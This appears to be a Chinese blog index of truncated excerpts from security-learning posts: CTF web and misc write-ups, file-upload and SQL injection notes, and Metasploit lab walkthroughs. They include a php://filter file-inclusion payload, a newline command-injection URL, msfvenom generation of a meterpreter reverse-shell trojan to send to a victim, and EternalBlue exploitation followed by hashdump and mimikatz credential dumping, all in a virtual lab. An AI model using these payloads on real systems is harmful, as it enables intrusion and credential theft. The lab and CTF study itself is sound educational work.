filter-文件包含例题:http://4.chinalover.sinaapp.com/web7/index.php
参考:https://blog.csdn.net/qq_35544379/article/details/78230629
发现有一个get file的的文件包含,但是要如何获取flag呢?一直想不通
悄咪咪地搜索了下write up
payload为http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php...
本来出道web题投稿到安恒的,安恒要写Dockerfile,怕是在为难我胖虎!!
好了,速学了一下docker,请教了docker忘的差不多的云计算选手
我的天,到最后还是一大堆bug
也就是搭建一个centos的环境,要有apache和php就行
没找到用centos镜像再去装apache和php的,找到了也是一堆bug,就拉了一个现成的
FROM naqoda/centos-apache-phpCOPY html/index.php /var/www/app/public_html/RUN echo “ServerName localhost:80” >...
1234567891011121314151617181920212223242526272829303132333435363738394041424344<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title></title></head><body><form method="POST" enctype="multipart/form-d...
这是油管上的代码,我在思考这种判别后缀的方式有没有漏洞,第一时间想到的是%00截断,但是实验后发现比如1.php%00.jpg,%00后面的已经过滤了,然后.号分隔取最后,无法绕过,我在freebuf上也看到这个白名单检测的问题(http://www.freebuf.com/vuls/128846.html)在分隔成数组之前已经是php后缀了当然往跟深处讲,如果网站有文件包含漏洞的话,将一句话木马变成png上传成功后,再利用文件包含,也是可行的方法!dvwa的后缀检测:更多白名单的后缀检测:(https://www.jb51.net/article/81320.htm)
sql注入一种常见的网络攻击手段,以前没学php的时候只会一点mysql的语言,万能密码啥的绕过,防御只了解过pdo,手工注入更是弱爆,直接sqlmap注入,现在学了php后,有了一个全新的认识
油管大佬介绍了利用mysqli_real_escape_string这个函数来防御SQL注入:(https://youtu.be/nTgFPcYRkys)
函数介绍:(http://www.w3school.com.cn/php/func_mysql_real_escape_string.asp)
于是我专门实验了万能密码的绕过
先在我的数据库创建一张表:
撸上我的代码:
看...
misc1F5算法:https://github.com/matthewgao/F5-steganography
java Extract Misc.jpg
zip伪加密1->0
mis2注释得到摩斯密码解密(为压缩包密码)
lsb隐写:https://github.com/livz/cloacked-pixel
python lsb.py extract (python2环境)
web3:web3原理:http://www.freebuf.com/articles/web/35353.html
swf zws头部解析:https://blog.csdn.net/Hundred...
ctf里某群友发的题:http://45.124.115.155:8003/a74a15c5fb626077/**
ls cat 啥的都被过滤了(http://45.124.115.155:8003/a74a15c5fb626077/ping.php?ip=127.0.0.1%0Amore%20ping.php):
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.086 ms
--- 127.0.0.1 ping statistics -...
win7靶机:192.168.1.38
kali:192.168.1.35
上一篇讲到通过ms17_010获取了shell,如果对方没有这个漏洞可以利用呢?换一种社会工程学的思路:
msfvenom -p windows/meterpreter/resverse_tcp lhost=192.168.1.35 lport=4444 -f exe -o /hack.exe 生成木马
将exe文件发送给靶机
use exploit/multi/handle
set payload windows/meterpreter/resverse_tcp
set lhost 192.168.1.3...
win7靶机:192.168.1.38(所有实验均在虚拟机上完成,切勿用于非法用途)
kali:192.168.1.35
use exploit/windows/smb/ms17_010_eternalblueset payload windows/meterpreter/reverse_tcp
查看下options
返回shell后:hashdump
load mimikatz
运行命令msv,导出hash
msv
然后执行kerberos即可获得目标机账号密码
kerberos
使用端口转发工具,将端口转发到访问者本地机器的某个端口,从而进行连接运行命令
portfwd...
12345678910111213141516171819202122232425<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><title>Document</title></head><body><img src="hack.jpg" id="image"><script>var test=document.getE...